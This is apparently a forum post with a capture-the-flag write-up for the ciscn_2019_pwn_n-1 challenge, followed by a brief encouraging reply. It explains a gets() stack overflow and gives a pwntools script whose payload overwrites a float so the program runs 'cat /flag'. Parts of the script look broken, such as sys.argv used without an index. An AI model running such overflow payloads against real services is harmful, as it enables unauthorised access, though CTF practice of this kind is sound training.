ciscn_2019_pwn_n-1 wp by kone
思路:gets()存在栈溢出漏洞,尝试覆盖v2的值为11.28125
注意:
需要将float转换成hex
exp:#-*- coding:utf-8 -*-
"""
// ciscn_2019_pwn_n-1 https://www.xuenixiang.com/ctfexercise-competition-416.html
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
func();
return 0;
}
int func()
{
int result; // eax
char v1; //
float v2; //
v2 = 0.0;
puts("Let's guess the number.");
gets(&v1);
if ( v2 == 11.28125 )
result = system("cat /flag");
else
result = puts("Its value should be 11.28125");
return result;
}
"""
from pwn import *
import sys
context(os="linux", log_level="debug")
def float_to_hex(f):
return hex(struct.unpack('<I', struct.pack('<f', f)))
if len(sys.argv) == 2:
p = process(sys.argv)
elif len(sys.argv) == 3:
p = remote(sys.argv, sys.argv)
else:
print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
exit(1)
p.recvuntil("Let's guess the number.\n")
# 0x41348000 = float_to_hex(11.28125)
payload = 'A' * 44 + "\x00\x80\x34\x41"
p.sendline(payload)
p.interactive()
很不错!继续努力,如果有需要,可以自己编译好题目提交平台,我可以帮你做成镜像保存,以后随时可以拿来实验
页:
[1]